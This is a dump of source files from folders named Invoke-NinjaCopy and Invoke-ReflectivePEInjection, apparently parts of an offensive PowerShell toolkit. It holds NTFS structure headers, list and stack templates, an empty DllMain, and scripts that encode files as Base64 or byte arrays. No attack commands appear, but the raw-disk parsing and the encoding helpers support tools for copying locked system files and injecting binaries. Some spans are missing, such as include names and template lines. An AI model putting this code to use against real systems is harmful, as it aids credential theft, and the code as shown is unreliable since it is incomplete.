/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS_Common.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS Class common definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_COMMON_H_CYB70289
18 | #define __NTFS_COMMON_H_CYB70289
19 |
20 | #include
21 | #include
22 | #include
23 | #include
24 |
25 | #include "NTFS_DataType.h"
26 |
27 | #define ATTR_NUMS 16 // Attribute Types count
28 | #define ATTR_INDEX(at) (((at)>>4)-1) // Attribute Type to Index, eg. 0x10->0, 0x30->2
29 | #define ATTR_MASK(at) (((DWORD)1)<
// Node of the intrusive singly-linked containers below (CSList, CStack).
// The container owns Entry: RemoveAll() deletes it, so it must be heap
// allocated with new.
struct NTSLIST_ENTRY
{
	NTSLIST_ENTRY *Next;   // next node, NULL at the tail
	ENTRY_TYPE *Entry;     // payload handed to InsertEntry()/Push()
};
82 |
83 | // List Entry Smart Pointer
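// Owning pointer to one heap-allocated entry: the held object is deleted on
// destruction and when a different pointer is assigned.
//
// NOTE(review): the class is not copy-safe -- the implicit copy constructor
// leaves two owners of one pointer. The original operator= returned *this BY
// VALUE, so every assignment built such a temporary copy whose destructor
// deleted the freshly assigned entry and left this object dangling. It now
// returns a reference; any copies made elsewhere still need auditing.
template <class ENTRY_TYPE>
class CEntrySmartPtr
{
public:
	CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
	{
		EntryPtr = ptr;
	}

	virtual ~CEntrySmartPtr()
	{
		if (EntryPtr)
			delete EntryPtr;
	}

private:
	const ENTRY_TYPE *EntryPtr;

public:
	// Take ownership of ptr, freeing the previously held entry (if any).
	// Assigning the pointer already held is a no-op instead of a
	// delete-then-dangle.
	__inline CEntrySmartPtr& operator = (const ENTRY_TYPE* ptr)
	{
		if (ptr != EntryPtr)
		{
			if (EntryPtr)
				delete EntryPtr;
			EntryPtr = ptr;
		}
		return *this;
	}

	__inline const ENTRY_TYPE* operator->() const
	{
		_ASSERT(EntryPtr);  // dereferencing an empty smart pointer is a caller bug
		return EntryPtr;
	}

	__inline BOOL IsValid() const
	{
		return EntryPtr != NULL;
	}
};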
125 |
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
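// Singly-linked list of heap-allocated ENTRY_TYPE objects with a built-in
// cursor for FindFirstEntry()/FindNextEntry() iteration. The list owns its
// entries: RemoveAll() and the destructor delete them. ThrowAll() forgets
// everything without freeing.
template <class ENTRY_TYPE>
class CSList
{
public:
	CSList()
	{
		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}

	virtual ~CSList()
	{
		RemoveAll();
	}

private:
	int EntryCount;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
	// Iteration cursor. Declared mutable because the const Find*Entry()
	// accessors advance it; the original cast away const to do so.
	mutable NTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;

public:
	// Get entry count
	__inline int GetCount() const
	{
		return EntryCount;
	}

	// Append entry at the tail; the list takes ownership of it.
	// Returns FALSE only if node allocation yields NULL, which with a
	// throwing operator new never happens.
	BOOL InsertEntry(ENTRY_TYPE *entry)
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
		if (!le)
			return FALSE;

		le->Entry = entry;
		le->Next = NULL;

		if (ListTail == NULL)
			ListHead = le; // Empty list
		else
			ListTail->Next = le;

		ListTail = le;

		EntryCount++;
		return TRUE;
	}

	// Delete every entry and node, leaving the list empty.
	void RemoveAll()
	{
		while (ListHead)
		{
			NTSLIST_ENTRY<ENTRY_TYPE> *next = ListHead->Next;
			delete ListHead->Entry;
			delete ListHead;

			ListHead = next;
		}

		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}

	// Reset the cursor to the head; returns its entry, or NULL if empty.
	__inline ENTRY_TYPE *FindFirstEntry() const
	{
		ListCurrent = ListHead;

		if (ListCurrent)
			return ListCurrent->Entry;
		else
			return NULL;
	}

	// Advance the cursor; returns the next entry, or NULL past the end.
	__inline ENTRY_TYPE *FindNextEntry() const
	{
		if (ListCurrent)
			ListCurrent = ListCurrent->Next;

		if (ListCurrent)
			return ListCurrent->Entry;
		else
			return NULL;
	}

	// Throw all entries
	// Caution! All entries are just thrown without free -- neither the
	// payloads nor the private NTSLIST_ENTRY nodes are deleted, so unless a
	// copy of this list still references the nodes they are leaked.
	__inline void ThrowAll()
	{
		ListHead = ListTail = NULL;
		ListCurrent = NULL;
		EntryCount = 0;
	}
}; //CSList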
228 |
229 |
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
// LIFO stack of heap-allocated ENTRY_TYPE objects built on NTSLIST_ENTRY
// nodes. Push() takes ownership of the entry, Pop() hands it back to the
// caller, and RemoveAll() (also run by the destructor) deletes whatever is
// still on the stack.
template <class ENTRY_TYPE>
class CStack
{
public:
	CStack() : EntryCount(0), ListHead(NULL), ListTail(NULL)
	{
	}

	virtual ~CStack()
	{
		RemoveAll();
	}

private:
	int EntryCount;
	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;   // top of the stack
	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;   // bottom of the stack

public:
	// Number of entries currently on the stack.
	__inline int GetCount() const
	{
		return EntryCount;
	}

	// Push entry on top. Returns FALSE only if node allocation yields NULL.
	BOOL Push(ENTRY_TYPE *entry)
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *node = new NTSLIST_ENTRY<ENTRY_TYPE>;
		if (node == NULL)
			return FALSE;

		node->Entry = entry;
		node->Next = ListHead;
		ListHead = node;
		if (!ListTail)
			ListTail = node;   // first element is also the bottom

		++EntryCount;
		return TRUE;
	}

	// Pop the top entry; NULL when the stack is empty. Ownership of the
	// returned entry passes to the caller.
	ENTRY_TYPE* Pop()
	{
		NTSLIST_ENTRY<ENTRY_TYPE> *top = ListHead;
		if (top == NULL)
			return NULL;

		ENTRY_TYPE *entry = top->Entry;
		ListHead = top->Next;
		if (ListTail == top)
			ListTail = ListHead;   // popped the only element; both are now NULL

		delete top;
		--EntryCount;
		return entry;
	}

	// Delete every remaining entry and node.
	void RemoveAll()
	{
		for (NTSLIST_ENTRY<ENTRY_TYPE> *node = ListHead; node != NULL; )
		{
			NTSLIST_ENTRY<ENTRY_TYPE> *next = node->Next;
			delete node->Entry;
			delete node;
			node = next;
		}

		ListHead = ListTail = NULL;
		EntryCount = 0;
	}
}; //CStack
316 |
317 | #endif
318 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS_DataType.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS data structures and definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_DATATYPE_H_CYB70289
18 | #define __NTFS_DATATYPE_H_CYB70289
19 |
20 | // NTFS Boot Sector BPB
21 |
22 | #define NTFS_SIGNATURE "NTFS "
23 |
24 | #pragma pack(1)
// NTFS boot sector / BIOS parameter block exactly as laid out on disk. Packed
// to 1 byte because fields are unaligned (BytesPerSector sits at offset 11);
// the members sum to 512 bytes, one sector. Every value is read from the raw
// volume: BytesPerSector, SectorsPerCluster, LCN_MFT and the "ClustersPer"
// fields feed later address arithmetic, so a parser should sanity check them
// (non-zero, plausible range) before dividing or multiplying by them.
typedef struct tagNTFS_BPB
{
	// jump instruction
	BYTE Jmp[3];

	// signature
	BYTE Signature[8];           // expected to match NTFS_SIGNATURE

	// BPB and extended BPB
	WORD BytesPerSector;
	BYTE SectorsPerCluster;
	WORD ReservedSectors;
	BYTE Zeros1[3];
	WORD NotUsed1;
	BYTE MediaDescriptor;
	WORD Zeros2;
	WORD SectorsPerTrack;
	WORD NumberOfHeads;
	DWORD HiddenSectors;
	DWORD NotUsed2;
	DWORD NotUsed3;
	ULONGLONG TotalSectors;
	ULONGLONG LCN_MFT;           // first cluster of $MFT
	ULONGLONG LCN_MFTMirr;       // first cluster of $MFTMirr
	DWORD ClustersPerFileRecord; // NOTE(review): on real volumes this is commonly a signed byte encoding (negative = 2^|n| bytes) -- confirm the parser handles that
	DWORD ClustersPerIndexBlock;
	BYTE VolumeSN[8];

	// boot code
	BYTE Code[430];

	//0xAA55 boot-sector marker
	BYTE _AA;
	BYTE _55;
} NTFS_BPB;
60 | #pragma pack()
61 |
62 |
63 | // MFT Indexes
64 | #define MFT_IDX_MFT 0
65 | #define MFT_IDX_MFT_MIRR 1
66 | #define MFT_IDX_LOG_FILE 2
67 | #define MFT_IDX_VOLUME 3
68 | #define MFT_IDX_ATTR_DEF 4
69 | #define MFT_IDX_ROOT 5
70 | #define MFT_IDX_BITMAP 6
71 | #define MFT_IDX_BOOT 7
72 | #define MFT_IDX_BAD_CLUSTER 8
73 | #define MFT_IDX_SECURE 9
74 | #define MFT_IDX_UPCASE 10
75 | #define MFT_IDX_EXTEND 11
76 | #define MFT_IDX_RESERVED12 12
77 | #define MFT_IDX_RESERVED13 13
78 | #define MFT_IDX_RESERVED14 14
79 | #define MFT_IDX_RESERVED15 15
80 | #define MFT_IDX_USER 16
81 |
82 |
83 | /******************************
84 | File Record
85 | ---------------------
86 | | File Record Header|
87 | ---------------------
88 | | Attribute 1 |
89 | ---------------------
90 | | Attribute 2 |
91 | ---------------------
92 | | ...... |
93 | ---------------------
94 | | 0xFFFFFFFF |
95 | ---------------------
96 | *******************************/
97 |
98 | // File Record Header
99 |
100 | #define FILE_RECORD_MAGIC 'ELIF'
101 | #define FILE_RECORD_FLAG_INUSE 0x01 // File record is in use
102 | #define FILE_RECORD_FLAG_DIR 0x02 // File record is a directory
103 |
// Header of one MFT FILE record as stored on disk. OffsetOfUS/SizeOfUS,
// OffsetOfAttr, RealSize and AllocSize are offsets and sizes read from the
// volume; keep them inside the record buffer (OffsetOfAttr < RealSize <=
// AllocSize, update-sequence range within the record) before dereferencing,
// or a malformed record walks the parser out of bounds.
typedef struct tagFILE_RECORD_HEADER
{
	DWORD Magic;           // "FILE" (FILE_RECORD_MAGIC)
	WORD OffsetOfUS;       // Offset of Update Sequence
	WORD SizeOfUS;         // Size in words of Update Sequence Number & Array
	ULONGLONG LSN;         // $LogFile Sequence Number
	WORD SeqNo;            // Sequence number
	WORD Hardlinks;        // Hard link count
	WORD OffsetOfAttr;     // Offset of the first Attribute
	WORD Flags;            // FILE_RECORD_FLAG_* bits
	DWORD RealSize;        // Real size of the FILE record
	DWORD AllocSize;       // Allocated size of the FILE record
	ULONGLONG RefToBase;   // File reference to the base FILE record
	WORD NextAttrId;       // Next Attribute Id
	WORD Align;            // Align to 4 byte boundary
	DWORD RecordNo;        // Number of this MFT Record
} FILE_RECORD_HEADER;
121 |
122 |
123 | /******************************
124 | Attribute
125 | --------------------
126 | | Attribute Header |
127 | --------------------
128 | | Attribute Data |
129 | --------------------
130 | *******************************/
131 |
132 | // Attribute Header
133 |
134 | #define ATTR_TYPE_STANDARD_INFORMATION 0x10
135 | #define ATTR_TYPE_ATTRIBUTE_LIST 0x20
136 | #define ATTR_TYPE_FILE_NAME 0x30
137 | #define ATTR_TYPE_OBJECT_ID 0x40
138 | #define ATTR_TYPE_SECURITY_DESCRIPTOR 0x50
139 | #define ATTR_TYPE_VOLUME_NAME 0x60
140 | #define ATTR_TYPE_VOLUME_INFORMATION 0x70
141 | #define ATTR_TYPE_DATA 0x80
142 | #define ATTR_TYPE_INDEX_ROOT 0x90
143 | #define ATTR_TYPE_INDEX_ALLOCATION 0xA0
144 | #define ATTR_TYPE_BITMAP 0xB0
145 | #define ATTR_TYPE_REPARSE_POINT 0xC0
146 | #define ATTR_TYPE_EA_INFORMATION 0xD0
147 | #define ATTR_TYPE_EA 0xE0
148 | #define ATTR_TYPE_LOGGED_UTILITY_STREAM 0x100
149 |
150 | #define ATTR_FLAG_COMPRESSED 0x0001
151 | #define ATTR_FLAG_ENCRYPTED 0x4000
152 | #define ATTR_FLAG_SPARSE 0x8000
153 |
// Common prefix of every attribute inside a FILE record. TotalSize is the
// stride to the next attribute and NameOffset/NameLength locate the optional
// name; all three are disk values and must be checked against the bytes left
// in the record before they are followed (a zero TotalSize would loop forever).
typedef struct tagATTR_HEADER_COMMON
{
	DWORD Type;        // Attribute Type (ATTR_TYPE_*)
	DWORD TotalSize;   // Length (including this header)
	BYTE NonResident;  // 0 - resident, 1 - non resident
	BYTE NameLength;   // name length in words
	WORD NameOffset;   // offset to the name
	WORD Flags;        // ATTR_FLAG_* bits
	WORD Id;           // Attribute Id
} ATTR_HEADER_COMMON;
164 |
// Header of a resident attribute: the value is stored inline in the FILE
// record. AttrOffset + AttrSize should stay within Header.TotalSize.
typedef struct tagATTR_HEADER_RESIDENT
{
	ATTR_HEADER_COMMON Header; // Common data structure
	DWORD AttrSize;            // Length of the attribute body
	WORD AttrOffset;           // Offset to the Attribute body
	BYTE IndexedFlag;          // Indexed flag
	BYTE Padding;              // Padding
} ATTR_HEADER_RESIDENT;
173 |
// Header of a non-resident attribute: the value lives in clusters described
// by the data runs at DataRunOffset. The three sizes are disk values that
// callers use for buffer sizing; they are expected to satisfy
// IniSize <= RealSize <= AllocSize and should be checked rather than trusted.
typedef struct tagATTR_HEADER_NON_RESIDENT
{
	ATTR_HEADER_COMMON Header;  // Common data structure
	ULONGLONG StartVCN;         // Starting VCN
	ULONGLONG LastVCN;          // Last VCN
	WORD DataRunOffset;         // Offset to the Data Runs
	WORD CompUnitSize;          // Compression unit size
	DWORD Padding;              // Padding
	ULONGLONG AllocSize;        // Allocated size of the attribute
	ULONGLONG RealSize;         // Real size of the attribute
	ULONGLONG IniSize;          // Initialized data size of the stream
} ATTR_HEADER_NON_RESIDENT;
186 |
187 |
188 | // Attribute: STANDARD_INFORMATION
189 |
190 | #define ATTR_STDINFO_PERMISSION_READONLY 0x00000001
191 | #define ATTR_STDINFO_PERMISSION_HIDDEN 0x00000002
192 | #define ATTR_STDINFO_PERMISSION_SYSTEM 0x00000004
193 | #define ATTR_STDINFO_PERMISSION_ARCHIVE 0x00000020
194 | #define ATTR_STDINFO_PERMISSION_DEVICE 0x00000040
195 | #define ATTR_STDINFO_PERMISSION_NORMAL 0x00000080
196 | #define ATTR_STDINFO_PERMISSION_TEMP 0x00000100
197 | #define ATTR_STDINFO_PERMISSION_SPARSE 0x00000200
198 | #define ATTR_STDINFO_PERMISSION_REPARSE 0x00000400
199 | #define ATTR_STDINFO_PERMISSION_COMPRESSED 0x00000800
200 | #define ATTR_STDINFO_PERMISSION_OFFLINE 0x00001000
201 | #define ATTR_STDINFO_PERMISSION_NCI 0x00002000
202 | #define ATTR_STDINFO_PERMISSION_ENCRYPTED 0x00004000
203 |
// $STANDARD_INFORMATION body. The four timestamps are raw 64-bit disk values;
// Permission carries the ATTR_STDINFO_PERMISSION_* bits.
typedef struct tagATTR_STANDARD_INFORMATION
{
	ULONGLONG CreateTime;   // File creation time
	ULONGLONG AlterTime;    // File altered time
	ULONGLONG MFTTime;      // MFT changed time
	ULONGLONG ReadTime;     // File read time
	DWORD Permission;       // Dos file permission (ATTR_STDINFO_PERMISSION_*)
	DWORD MaxVersionNo;     // Maximum number of file versions
	DWORD VersionNo;        // File version number
	DWORD ClassId;          // Class Id
	DWORD OwnerId;          // Owner Id
	DWORD SecurityId;       // Security Id
	ULONGLONG QuotaCharged; // Quota charged
	ULONGLONG USN;          // USN Journal
} ATTR_STANDARD_INFORMATION;
219 |
220 |
221 | // Attribute: ATTRIBUTE_LIST
222 |
// One entry of an $ATTRIBUTE_LIST, naming an attribute that lives in the FILE
// record referenced by BaseRef. RecordSize is the stride to the next entry
// and NameOffset/NameLength locate the name; both are disk values to keep
// within the list before use.
typedef struct tagATTR_ATTRIBUTE_LIST
{
	DWORD AttrType;     // Attribute type
	WORD RecordSize;    // Record length
	BYTE NameLength;    // Name length in characters
	BYTE NameOffset;    // Name offset
	ULONGLONG StartVCN; // Start VCN
	ULONGLONG BaseRef;  // Base file reference to the attribute
	WORD AttrId;        // Attribute Id
} ATTR_ATTRIBUTE_LIST;
233 |
234 | // Attribute: FILE_NAME
235 |
236 | #define ATTR_FILENAME_FLAG_READONLY 0x00000001
237 | #define ATTR_FILENAME_FLAG_HIDDEN 0x00000002
238 | #define ATTR_FILENAME_FLAG_SYSTEM 0x00000004
239 | #define ATTR_FILENAME_FLAG_ARCHIVE 0x00000020
240 | #define ATTR_FILENAME_FLAG_DEVICE 0x00000040
241 | #define ATTR_FILENAME_FLAG_NORMAL 0x00000080
242 | #define ATTR_FILENAME_FLAG_TEMP 0x00000100
243 | #define ATTR_FILENAME_FLAG_SPARSE 0x00000200
244 | #define ATTR_FILENAME_FLAG_REPARSE 0x00000400
245 | #define ATTR_FILENAME_FLAG_COMPRESSED 0x00000800
246 | #define ATTR_FILENAME_FLAG_OFFLINE 0x00001000
247 | #define ATTR_FILENAME_FLAG_NCI 0x00002000
248 | #define ATTR_FILENAME_FLAG_ENCRYPTED 0x00004000
249 | #define ATTR_FILENAME_FLAG_DIRECTORY 0x10000000
250 | #define ATTR_FILENAME_FLAG_INDEXVIEW 0x20000000
251 |
252 | #define ATTR_FILENAME_NAMESPACE_POSIX 0x00
253 | #define ATTR_FILENAME_NAMESPACE_WIN32 0x01
254 | #define ATTR_FILENAME_NAMESPACE_DOS 0x02
255 |
// $FILE_NAME body. Name is a variable-length run of 16-bit characters
// starting at the 1-element placeholder; the struct carries no terminator,
// so readers must use NameLength and keep it inside the attribute's size.
typedef struct tagATTR_FILE_NAME
{
	ULONGLONG ParentRef;  // File reference to the parent directory
	ULONGLONG CreateTime; // File creation time
	ULONGLONG AlterTime;  // File altered time
	ULONGLONG MFTTime;    // MFT changed time
	ULONGLONG ReadTime;   // File read time
	ULONGLONG AllocSize;  // Allocated size of the file
	ULONGLONG RealSize;   // Real size of the file
	DWORD Flags;          // ATTR_FILENAME_FLAG_* bits
	DWORD ER;             // Used by EAs and Reparse
	BYTE NameLength;      // Filename length in characters
	BYTE NameSpace;       // Filename space (ATTR_FILENAME_NAMESPACE_*)
	WORD Name[1];         // Filename (variable length, not terminated)
} ATTR_FILE_NAME;
271 |
272 |
273 | // Attribute: VOLUME_INFORMATION
274 |
275 | #define ATTR_VOLINFO_FLAG_DIRTY 0x0001 // Dirty
276 | #define ATTR_VOLINFO_FLAG_RLF 0x0002 // Resize logfile
277 | #define ATTR_VOLINFO_FLAG_UOM 0x0004 // Upgrade on mount
278 | #define ATTR_VOLINFO_FLAG_MONT 0x0008 // Mounted on NT4
279 | #define ATTR_VOLINFO_FLAG_DUSN 0x0010 // Delete USN underway
280 | #define ATTR_VOLINFO_FLAG_ROI 0x0020 // Repair object Ids
281 | #define ATTR_VOLINFO_FLAG_MBC 0x8000 // Modified by chkdsk
282 |
// $VOLUME_INFORMATION body: NTFS version and the ATTR_VOLINFO_FLAG_* bits.
typedef struct tagATTR_VOLUME_INFORMATION
{
	BYTE Reserved1[8]; // Always 0 ?
	BYTE MajorVersion; // Major version
	BYTE MinorVersion; // Minor version
	WORD Flags;        // Flags (ATTR_VOLINFO_FLAG_*)
	BYTE Reserved2[4]; // Always 0 ?
} ATTR_VOLUME_INFORMATION;
291 |
292 |
293 | // Attribute: INDEX_ROOT
294 | /******************************
295 | INDEX_ROOT
296 | ---------------------
297 | | Index Root Header |
298 | ---------------------
299 | | Index Header |
300 | ---------------------
301 | | Index Entry |
302 | ---------------------
303 | | Index Entry |
304 | ---------------------
305 | | ...... |
306 | ---------------------
307 | *******************************/
308 |
309 | #define ATTR_INDEXROOT_FLAG_SMALL 0x00 // Fits in Index Root File Record
310 | #define ATTR_INDEXROOT_FLAG_LARGE 0x01 // Index Allocation and Bitmap needed
311 |
// $INDEX_ROOT body: root header, then an index header whose EntryOffset is
// relative to the index header itself (offset 0x10 of this struct), then the
// entries. EntryOffset/TotalEntrySize/AllocEntrySize come from disk and must
// be kept within the attribute before the entries are walked.
typedef struct tagATTR_INDEX_ROOT
{
	// Index Root Header
	DWORD AttrType;        // Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)
	DWORD CollRule;        // Collation rule
	DWORD IBSize;          // Size of index block
	BYTE ClustersPerIB;    // Clusters per index block (same as BPB?)
	BYTE Padding1[3];      // Padding
	// Index Header
	DWORD EntryOffset;     // Offset to the first index entry, relative to this address(0x10)
	DWORD TotalEntrySize;  // Total size of the index entries
	DWORD AllocEntrySize;  // Allocated size of the index entries
	BYTE Flags;            // ATTR_INDEXROOT_FLAG_*
	BYTE Padding2[3];      // Padding
} ATTR_INDEX_ROOT;
327 |
328 |
329 | // INDEX ENTRY
330 |
331 | #define INDEX_ENTRY_FLAG_SUBNODE 0x01 // Index entry points to a sub-node
332 | #define INDEX_ENTRY_FLAG_LAST 0x02 // Last index entry in the node, no Stream
333 |
// On-disk directory index entry. Every field is read raw from the volume:
// Size is the stride to the next entry and StreamSize the length of the
// payload that follows the 16-byte header, so both must be kept within the
// containing index node before being used to step or copy.
typedef struct tagINDEX_ENTRY
{
	ULONGLONG FileReference;   // Low 6B: MFT record index, High 2B: MFT record sequence number
	WORD Size;                 // Length of the index entry (stride to the next entry)
	WORD StreamSize;           // Length of the stream
	BYTE Flags;                // INDEX_ENTRY_FLAG_* bits
	BYTE Padding[3];           // Padding
	BYTE Stream[1];            // Stream (variable length; 1-element placeholder)
	// VCN of the sub node in Index Allocation, Offset = Size - 8
} INDEX_ENTRY;
344 |
345 |
346 | // INDEX BLOCK
347 | /******************************
348 | INDEX_BLOCK
349 | -----------------------
350 | | Index Block Header |
351 | -----------------------
352 | | Index Header |
353 | -----------------------
354 | | Index Entry |
355 | -----------------------
356 | | Index Entry |
357 | -----------------------
358 | | ...... |
359 | -----------------------
360 | *******************************/
361 |
362 | #define INDEX_BLOCK_MAGIC 'XDNI'
363 |
// On-disk INDX block: block header, then an index header whose EntryOffset is
// relative to the index header itself (offset 0x18 of this struct), then the
// entries. Magic, OffsetOfUS and SizeOfUS are disk data: check Magic and keep
// the update-sequence range inside the block before the entries are trusted.
typedef struct tagINDEX_BLOCK
{
	// Index Block Header
	DWORD Magic;           // "INDX" (INDEX_BLOCK_MAGIC)
	WORD OffsetOfUS;       // Offset of Update Sequence
	WORD SizeOfUS;         // Size in words of Update Sequence Number & Array
	ULONGLONG LSN;         // $LogFile Sequence Number
	ULONGLONG VCN;         // VCN of this index block in the index allocation
	// Index Header
	DWORD EntryOffset;     // Offset of the index entries, relative to this address(0x18)
	DWORD TotalEntrySize;  // Total size of the index entries
	DWORD AllocEntrySize;  // Allocated size of index entries
	BYTE NotLeaf;          // 1 if not leaf node (has children)
	BYTE Padding[3];       // Padding
} INDEX_BLOCK;
379 |
380 | #endif
381 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
// DLL entry point. Every loader notification (process and thread attach and
// detach) is a no-op; the loader is always told initialization succeeded.
// hModule and lpReserved are accepted for the required signature only.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
	(void)hModule;
	(void)lpReserved;
	// DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH and
	// DLL_PROCESS_DETACH all take the same (empty) path.
	(void)ul_reason_for_call;

	return TRUE;
}
36 |
37 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
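#pragma once

// Including SDKDDKVer.h defines the highest available Windows platform.

// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.

// The header name below was lost when this listing was rendered; it is the
// one the comment above refers to.
#include <SDKDDKVer.h>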
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy purposes, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Convert-FileToBase64String.ps1:
--------------------------------------------------------------------------------
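<#
.SYNOPSIS
Reads a file and writes its contents to the pipeline as one Base64 string.

.PARAMETER File
Path of the file to encode. Relative paths are resolved against the current
PowerShell location.
#>
Param(
	[Parameter(Position=0, Mandatory=$true)]
	[String]
	$File
)

# [System.IO.File] resolves relative paths against the process working
# directory, which is not necessarily PowerShell's current location. Resolve
# through the provider first so a relative $File means what the caller sees.
$ResolvedPath = (Resolve-Path -LiteralPath $File).ProviderPath

[Byte[]]$Bytes = [System.IO.File]::ReadAllBytes($ResolvedPath)

$B64String = [String][Convert]::ToBase64String($Bytes)

Write-Output $B64String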
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Convert-FileToByteArrayString.ps1:
--------------------------------------------------------------------------------
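<#
.SYNOPSIS
Reads a file and returns its bytes as a comma-separated list of decimal values.

.PARAMETER File
Path of the file to read. Relative paths are resolved against the current
PowerShell location.

.OUTPUTS
String such as "77,90,144"; an empty file yields an empty string.
#>
Param(
	[Parameter(Position=0, Mandatory=$true)]
	[String]
	$File
)

# [System.IO.File] resolves relative paths against the process working
# directory, which is not necessarily PowerShell's current location. Resolve
# through the provider first so a relative $File means what the caller sees.
$ResolvedPath = (Resolve-Path -LiteralPath $File).ProviderPath

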